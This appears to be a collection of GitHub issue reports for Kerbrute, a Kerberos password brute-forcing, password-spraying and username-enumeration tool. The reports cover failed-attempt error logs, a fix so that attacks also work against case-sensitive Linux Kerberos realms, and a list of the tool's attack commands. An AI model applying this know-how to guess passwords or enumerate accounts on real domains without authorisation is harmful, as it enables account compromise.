2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated
2021/12/04 20:06:44 >  [!] [email protected] - [Root cause: Encoding_Error] Encoding_Error: failed to unmarshal KDC's reply: asn1: syntax error: sequence truncated

I've had this first come up on the AttackBox and was able to replicate on a Kali machine.

I don't know if that's on your end, but good luck!

Realm gets uppercase'd which doesn't work with Linux Kerberos 5 implementation

Hi, I tested this tool against a Linux DC running Kerberos and OpenLDAP ( https://ubuntu.com/server/docs/service-kerberos-with-openldap-backend ) and noticed that all attempts failed due to the realm getting uppercased here from the domain name. While the Microsoft implementation is case insensitive (as all MS things :D), the Linux one is definitely case sensitive, meaning that a -d example.com argument will result in EXAMPLE.COM, which fails.

I think that uppercasing can just be removed, in which case it'll work for both implementation (and the user can just pass whatever case they want).

Typo

Under Use in README.md you wrote "Kerbrute has three main commands:" but you list four.
bruteuser - Bruteforce a single user's password from a wordlist
bruteforce - Read username:password combos from a file or stdin and test them
passwordspray - Test a single password against a list of users
userenum - Enumerate valid domain usernames via Kerberos

AS_REQ PAData required

Hi,

Great tool but I keep getting the following error when attempting to bruteforce passwords:

[Root cause: Encrypting_Error] KRBMessage_Handling_Error: AS Exchange Error: failed setting AS_REQ PAData for pre-authentication required < Encrypting_Error: error getting etype for pre-auth encryption < Encrypting_Error: error creating etype: unknown or unsupported EType: 0

Could be related to: jcmturner/gokrb5#157
